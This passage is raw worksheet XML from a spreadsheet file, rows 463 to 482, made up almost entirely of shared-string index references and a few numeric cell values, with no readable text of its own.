        <v>17</v>
      </c>
      <c r="S463" s="12" t="s">
        <v>3656</v>
      </c>
      <c r="T463" s="12" t="s">
        <v>3657</v>
      </c>
      <c r="U463" s="12" t="s">
        <v>3658</v>
      </c>
      <c r="V463" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W463" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X463" s="12">
        <v>13</v>
      </c>
      <c r="Y463" s="12" t="s">
        <v>3659</v>
      </c>
    </row>
    <row r="464" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A464" s="12">
        <v>1866</v>
      </c>
      <c r="B464" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C464" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D464" s="12" t="s">
        <v>28726</v>
      </c>
      <c r="F464" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G464" s="12" t="s">
        <v>3660</v>
      </c>
      <c r="H464" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I464" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J464" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K464" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L464" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M464" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N464" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O464" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P464" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q464" s="12">
        <v>2.6</v>
      </c>
      <c r="R464" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S464" s="12" t="s">
        <v>3661</v>
      </c>
      <c r="T464" s="12" t="s">
        <v>3662</v>
      </c>
      <c r="U464" s="12" t="s">
        <v>3663</v>
      </c>
      <c r="V464" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W464" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X464" s="12">
        <v>6</v>
      </c>
      <c r="Y464" s="12" t="s">
        <v>3664</v>
      </c>
    </row>
    <row r="465" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A465" s="12">
        <v>1869</v>
      </c>
      <c r="B465" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D465" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E465" s="12" t="s">
        <v>31436</v>
      </c>
      <c r="F465" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G465" s="12" t="s">
        <v>3665</v>
      </c>
      <c r="H465" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I465" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J465" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K465" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L465" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M465" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N465" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O465" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P465" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q465" s="12">
        <v>2.6</v>
      </c>
      <c r="R465" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S465" s="12" t="s">
        <v>3666</v>
      </c>
      <c r="T465" s="12" t="s">
        <v>3667</v>
      </c>
      <c r="U465" s="12" t="s">
        <v>3668</v>
      </c>
      <c r="V465" s="12" t="s">
        <v>1864</v>
      </c>
      <c r="W465" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X465" s="12">
        <v>10</v>
      </c>
      <c r="Y465" s="12" t="s">
        <v>3669</v>
      </c>
    </row>
    <row r="466" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A466" s="12">
        <v>1888</v>
      </c>
      <c r="B466" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C466" s="12" t="s">
        <v>28727</v>
      </c>
      <c r="D466" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F466" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G466" s="12" t="s">
        <v>3673</v>
      </c>
      <c r="H466" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I466" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J466" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K466" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L466" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M466" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N466" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O466" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P466" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q466" s="12">
        <v>2.6</v>
      </c>
      <c r="R466" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S466" s="12" t="s">
        <v>3674</v>
      </c>
      <c r="T466" s="12" t="s">
        <v>3675</v>
      </c>
      <c r="U466" s="12" t="s">
        <v>3676</v>
      </c>
      <c r="V466" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W466" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X466" s="12">
        <v>8</v>
      </c>
      <c r="Y466" s="12" t="s">
        <v>3677</v>
      </c>
    </row>
    <row r="467" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A467" s="12">
        <v>1891</v>
      </c>
      <c r="B467" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D467" s="12" t="s">
        <v>28728</v>
      </c>
      <c r="E467" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F467" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G467" s="12" t="s">
        <v>3678</v>
      </c>
      <c r="H467" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I467" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J467" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K467" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L467" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M467" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N467" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O467" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P467" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q467" s="12">
        <v>2.6</v>
      </c>
      <c r="R467" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S467" s="12" t="s">
        <v>3679</v>
      </c>
      <c r="T467" s="12" t="s">
        <v>3671</v>
      </c>
      <c r="U467" s="12" t="s">
        <v>3680</v>
      </c>
      <c r="V467" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W467" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X467" s="12">
        <v>1</v>
      </c>
      <c r="Y467" s="12" t="s">
        <v>3681</v>
      </c>
    </row>
    <row r="468" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A468" s="12">
        <v>1896</v>
      </c>
      <c r="B468" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D468" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F468" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G468" s="12" t="s">
        <v>3682</v>
      </c>
      <c r="H468" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I468" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J468" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K468" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L468" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M468" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N468" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O468" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P468" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q468" s="12">
        <v>2.6</v>
      </c>
      <c r="R468" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S468" s="12" t="s">
        <v>3683</v>
      </c>
      <c r="T468" s="12" t="s">
        <v>3684</v>
      </c>
      <c r="U468" s="12" t="s">
        <v>3685</v>
      </c>
      <c r="V468" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W468" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X468" s="12">
        <v>2</v>
      </c>
      <c r="Y468" s="12" t="s">
        <v>3686</v>
      </c>
    </row>
    <row r="469" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A469" s="12">
        <v>1897</v>
      </c>
      <c r="B469" s="12" t="s">
        <v>28729</v>
      </c>
      <c r="D469" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F469" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G469" s="12" t="s">
        <v>3687</v>
      </c>
      <c r="H469" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I469" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J469" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K469" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L469" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M469" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N469" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O469" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P469" s="12" t="s">
        <v>3688</v>
      </c>
      <c r="Q469" s="12">
        <v>2.6</v>
      </c>
      <c r="R469" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S469" s="12" t="s">
        <v>3689</v>
      </c>
      <c r="T469" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U469" s="12" t="s">
        <v>3690</v>
      </c>
      <c r="V469" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W469" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X469" s="12">
        <v>5</v>
      </c>
      <c r="Y469" s="12" t="s">
        <v>3691</v>
      </c>
    </row>
    <row r="470" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A470" s="12">
        <v>1899</v>
      </c>
      <c r="B470" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D470" s="12" t="s">
        <v>28730</v>
      </c>
      <c r="F470" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G470" s="12" t="s">
        <v>3693</v>
      </c>
      <c r="H470" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I470" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J470" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K470" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L470" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M470" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N470" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O470" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P470" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q470" s="12">
        <v>2.6</v>
      </c>
      <c r="R470" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S470" s="12" t="s">
        <v>3694</v>
      </c>
      <c r="T470" s="12" t="s">
        <v>3695</v>
      </c>
      <c r="U470" s="12" t="s">
        <v>3696</v>
      </c>
      <c r="V470" s="12" t="s">
        <v>3697</v>
      </c>
      <c r="W470" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X470" s="12">
        <v>1</v>
      </c>
      <c r="Y470" s="12" t="s">
        <v>3698</v>
      </c>
    </row>
    <row r="471" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A471" s="12">
        <v>1902</v>
      </c>
      <c r="B471" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C471" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D471" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F471" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G471" s="12" t="s">
        <v>3699</v>
      </c>
      <c r="H471" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I471" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J471" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K471" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L471" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M471" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N471" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O471" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P471" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q471" s="12">
        <v>2.6</v>
      </c>
      <c r="R471" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S471" s="12" t="s">
        <v>3700</v>
      </c>
      <c r="T471" s="12" t="s">
        <v>3701</v>
      </c>
      <c r="U471" s="12" t="s">
        <v>3702</v>
      </c>
      <c r="V471" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W471" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X471" s="12">
        <v>4</v>
      </c>
      <c r="Y471" s="12" t="s">
        <v>3703</v>
      </c>
    </row>
    <row r="472" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A472" s="12">
        <v>1909</v>
      </c>
      <c r="B472" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C472" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D472" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F472" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G472" s="12" t="s">
        <v>3704</v>
      </c>
      <c r="H472" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I472" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J472" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K472" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L472" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M472" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N472" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O472" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P472" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q472" s="12">
        <v>2.6</v>
      </c>
      <c r="R472" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S472" s="12" t="s">
        <v>3705</v>
      </c>
      <c r="T472" s="12" t="s">
        <v>3706</v>
      </c>
      <c r="U472" s="12" t="s">
        <v>3707</v>
      </c>
      <c r="V472" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W472" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X472" s="12">
        <v>2</v>
      </c>
      <c r="Y472" s="12" t="s">
        <v>3708</v>
      </c>
    </row>
    <row r="473" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A473" s="12">
        <v>1913</v>
      </c>
      <c r="B473" s="12" t="s">
        <v>28731</v>
      </c>
      <c r="C473" s="12" t="s">
        <v>28732</v>
      </c>
      <c r="D473" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F473" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G473" s="12" t="s">
        <v>3709</v>
      </c>
      <c r="H473" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I473" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J473" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K473" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L473" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M473" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N473" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O473" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P473" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q473" s="12">
        <v>2.6</v>
      </c>
      <c r="R473" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S473" s="12" t="s">
        <v>3710</v>
      </c>
      <c r="T473" s="12" t="s">
        <v>3711</v>
      </c>
      <c r="U473" s="12" t="s">
        <v>2366</v>
      </c>
      <c r="V473" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W473" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X473" s="12">
        <v>0</v>
      </c>
      <c r="Y473" s="12" t="s">
        <v>3712</v>
      </c>
    </row>
    <row r="474" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A474" s="12">
        <v>1919</v>
      </c>
      <c r="B474" s="12" t="s">
        <v>28733</v>
      </c>
      <c r="D474" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F474" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G474" s="12" t="s">
        <v>3720</v>
      </c>
      <c r="H474" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I474" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J474" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K474" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L474" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M474" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N474" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O474" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P474" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q474" s="12">
        <v>2.6</v>
      </c>
      <c r="R474" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S474" s="12" t="s">
        <v>3721</v>
      </c>
      <c r="T474" s="12" t="s">
        <v>3722</v>
      </c>
      <c r="U474" s="12" t="s">
        <v>3723</v>
      </c>
      <c r="V474" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W474" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X474" s="12">
        <v>6</v>
      </c>
      <c r="Y474" s="12" t="s">
        <v>3724</v>
      </c>
    </row>
    <row r="475" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A475" s="12">
        <v>1923</v>
      </c>
      <c r="B475" s="12" t="s">
        <v>28733</v>
      </c>
      <c r="D475" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F475" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G475" s="12" t="s">
        <v>3730</v>
      </c>
      <c r="H475" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I475" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J475" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K475" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L475" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M475" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N475" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O475" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P475" s="12" t="s">
        <v>3731</v>
      </c>
      <c r="Q475" s="12">
        <v>2.6</v>
      </c>
      <c r="R475" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S475" s="12" t="s">
        <v>3732</v>
      </c>
      <c r="T475" s="12" t="s">
        <v>3733</v>
      </c>
      <c r="U475" s="12" t="s">
        <v>3723</v>
      </c>
      <c r="V475" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W475" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X475" s="12">
        <v>3</v>
      </c>
      <c r="Y475" s="12" t="s">
        <v>3734</v>
      </c>
    </row>
    <row r="476" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A476" s="12">
        <v>1929</v>
      </c>
      <c r="B476" s="12" t="s">
        <v>28731</v>
      </c>
      <c r="C476" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D476" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F476" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G476" s="12" t="s">
        <v>3739</v>
      </c>
      <c r="H476" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I476" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J476" s="12" t="s">
        <v>1269</v>
      </c>
      <c r="K476" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L476" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M476" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N476" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O476" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P476" s="12" t="s">
        <v>3740</v>
      </c>
      <c r="Q476" s="12">
        <v>2.6</v>
      </c>
      <c r="R476" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S476" s="12" t="s">
        <v>3741</v>
      </c>
      <c r="T476" s="12" t="s">
        <v>2550</v>
      </c>
      <c r="U476" s="12" t="s">
        <v>3742</v>
      </c>
      <c r="V476" s="12" t="s">
        <v>1760</v>
      </c>
      <c r="W476" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X476" s="12">
        <v>3</v>
      </c>
      <c r="Y476" s="12" t="s">
        <v>3743</v>
      </c>
    </row>
    <row r="477" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A477" s="12">
        <v>1930</v>
      </c>
      <c r="B477" s="12" t="s">
        <v>28734</v>
      </c>
      <c r="D477" s="12" t="s">
        <v>28735</v>
      </c>
      <c r="E477" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F477" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G477" s="12" t="s">
        <v>3744</v>
      </c>
      <c r="H477" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I477" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J477" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K477" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L477" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M477" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N477" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O477" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P477" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q477" s="12">
        <v>2.6</v>
      </c>
      <c r="R477" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S477" s="12" t="s">
        <v>3745</v>
      </c>
      <c r="T477" s="12" t="s">
        <v>3746</v>
      </c>
      <c r="U477" s="12" t="s">
        <v>3747</v>
      </c>
      <c r="V477" s="12" t="s">
        <v>3213</v>
      </c>
      <c r="W477" s="12">
        <v>3882</v>
      </c>
      <c r="X477" s="12">
        <v>12</v>
      </c>
      <c r="Y477" s="12" t="s">
        <v>3748</v>
      </c>
    </row>
    <row r="478" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A478" s="12">
        <v>1942</v>
      </c>
      <c r="B478" s="12" t="s">
        <v>28736</v>
      </c>
      <c r="D478" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F478" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G478" s="12" t="s">
        <v>3754</v>
      </c>
      <c r="H478" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I478" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J478" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K478" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L478" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M478" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N478" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O478" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P478" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q478" s="12">
        <v>2.6</v>
      </c>
      <c r="R478" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S478" s="12" t="s">
        <v>3755</v>
      </c>
      <c r="T478" s="12" t="s">
        <v>3756</v>
      </c>
      <c r="U478" s="12" t="s">
        <v>3757</v>
      </c>
      <c r="V478" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W478" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X478" s="12">
        <v>2</v>
      </c>
      <c r="Y478" s="12" t="s">
        <v>3758</v>
      </c>
    </row>
    <row r="479" spans="1:25" x14ac:dyDescent="0.3">
      <c r="A479" s="12">
        <v>1947</v>
      </c>
      <c r="B479" s="12" t="s">
        <v>28734</v>
      </c>
      <c r="D479" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F479" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G479" s="12" t="s">
        <v>28737</v>
      </c>
      <c r="H479" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I479" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J479" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K479" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L479" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M479" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N479" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O479" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P479" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q479" s="12">
        <v>2.6</v>
      </c>
      <c r="R479" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S479" s="12" t="s">
        <v>3764</v>
      </c>
      <c r="T479" s="12" t="s">
        <v>3765</v>
      </c>
      <c r="U479" s="12" t="s">
        <v>3766</v>
      </c>
      <c r="V479" s="12" t="s">
        <v>100</v>
      </c>
      <c r="W479" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X479" s="12">
        <v>2</v>
      </c>
      <c r="Y479" s="12" t="s">
        <v>3767</v>
      </c>
    </row>
    <row r="480" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A480" s="12">
        <v>1950</v>
      </c>
      <c r="B480" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D480" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F480" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G480" s="12" t="s">
        <v>3777</v>
      </c>
      <c r="H480" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I480" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J480" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K480" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L480" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M480" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N480" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O480" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P480" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q480" s="12">
        <v>2.6</v>
      </c>
      <c r="R480" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S480" s="12" t="s">
        <v>3778</v>
      </c>
      <c r="T480" s="12" t="s">
        <v>3779</v>
      </c>
      <c r="U480" s="12" t="s">
        <v>3780</v>
      </c>
      <c r="V480" s="12" t="s">
        <v>1068</v>
      </c>
      <c r="W480" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X480" s="12">
        <v>1</v>
      </c>
      <c r="Y480" s="12" t="s">
        <v>3781</v>
      </c>
    </row>
    <row r="481" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A481" s="12">
        <v>1959</v>
      </c>
      <c r="B481" s="12" t="s">
        <v>28738</v>
      </c>
      <c r="D481" s="12" t="s">
        <v>28739</v>
      </c>
      <c r="E481" s="12" t="s">
        <v>31445</v>
      </c>
      <c r="F481" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G481" s="12" t="s">
        <v>3787</v>
      </c>
      <c r="H481" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I481" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J481" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K481" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L481" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M481" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N481" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O481" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P481" s="12" t="s">
        <v>3788</v>
      </c>
      <c r="Q481" s="12">
        <v>2.6</v>
      </c>
      <c r="R481" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S481" s="12" t="s">
        <v>3789</v>
      </c>
      <c r="T481" s="12" t="s">
        <v>3790</v>
      </c>
      <c r="U481" s="12" t="s">
        <v>3791</v>
      </c>
      <c r="V481" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W481" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X481" s="12">
        <v>5</v>
      </c>
      <c r="Y481" s="12" t="s">
        <v>3792</v>
      </c>
    </row>
    <row r="482" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A482" s="12">
        <v>1962</v>
      </c>
      <c r="B482" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D482" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E482" s="12" t="s">
        <v>31445</v>
      </c>
      <c r="F482" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G482" s="12" t="s">
        <v>3793</v>
      </c>
      <c r="H482" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I482" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J482" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K482" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L482" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M482" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N482" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O482" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P482" s="12" t="s">
        <v>3735</v>
      </c>
      <c r="Q482" s="12">
        <v>2.6</v>
      </c>
      <c r="R482" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S482" s="12" t="s">
        <v>3794</v>
      </c>
      <c r="T482" s="12" t="s">
        <v>3795</v>
      </c>
      <c r="U482" s="12" t="s">
        <v>3796</v>
      </c>
